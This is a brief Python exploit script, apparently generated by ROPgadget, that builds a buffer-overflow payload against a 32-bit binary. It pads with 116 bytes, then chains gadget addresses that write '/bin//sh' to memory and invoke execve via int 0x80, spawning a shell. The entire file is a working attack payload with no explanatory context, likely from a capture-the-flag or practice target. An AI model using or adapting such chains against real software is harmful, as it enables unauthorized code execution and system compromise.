#!/usr/bin/env python3
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = ''

for i in range(116):
        p+= 'A'


p += pack('<I', 0x0806f68b) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x080b9116) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x08054c7b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f68b) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x080b9116) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x08054c7b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f68b) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080496c3) # xor eax, eax ; ret
p += pack('<I', 0x08054c7b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x080d66ec) # pop ecx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x0806f68b) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080496c3) # xor eax, eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x08048a17) # inc eax ; ret
p += pack('<I', 0x0806fc90) # int 0x80 ; ret

print(p)
